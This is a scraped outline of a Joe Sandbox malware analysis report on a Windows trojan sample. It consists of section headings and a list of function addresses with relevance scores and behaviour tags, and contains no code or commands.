Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

System Behavior

Analysis Process: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exePID: 3648, Parent PID: 1028

General

Chronological Activities

Disassembly

Analysis Process: SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exePID: 3648, Parent PID: 1028COMMON

Execution Graph

Windows Analysis Report
SecuriteInfo.com.Win32.TrojanX-gen.23930.29642.exe

Function 005A8610 Relevance: 196.6, APIs: 73, Strings: 39, Instructions: 584
libraryloaderCOMMON

Function 00FB1300 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 297
librarymemoryloaderCOMMON

Function 00FB2F40 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43
timeCOMMON

Function 005A8DC0 Relevance: 3.0, APIs: 2, Instructions: 49
COMMON

Function 00FB1710 Relevance: 1.6, APIs: 1, Instructions: 103
COMMON

Function 005A5E60 Relevance: 68.6, APIs: 30, Strings: 9, Instructions: 309
libraryfileloaderCOMMON

Function 005A6690 Relevance: 52.7, APIs: 27, Strings: 3, Instructions: 230
memorynetworkfileCOMMON

Function 005A5AE0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 285
injectionthreadprocessCOMMON

Function 005A8306 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 177
sleepencryptionfileCOMMON

Function 005A7640 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 174
memoryCOMMON

Function 005A7850 Relevance: 28.4, APIs: 12, Strings: 4, Instructions: 434
memorystringCOMMON

Function 005A6BB0 Relevance: 70.4, APIs: 31, Strings: 9, Instructions: 426
memorycomCOMMON

Function 005A7D40 Relevance: 61.6, APIs: 21, Strings: 14, Instructions: 350
libraryloadersleepCOMMON

Function 00FB2AE0 Relevance: 37.0, APIs: 3, Strings: 18, Instructions: 276
COMMON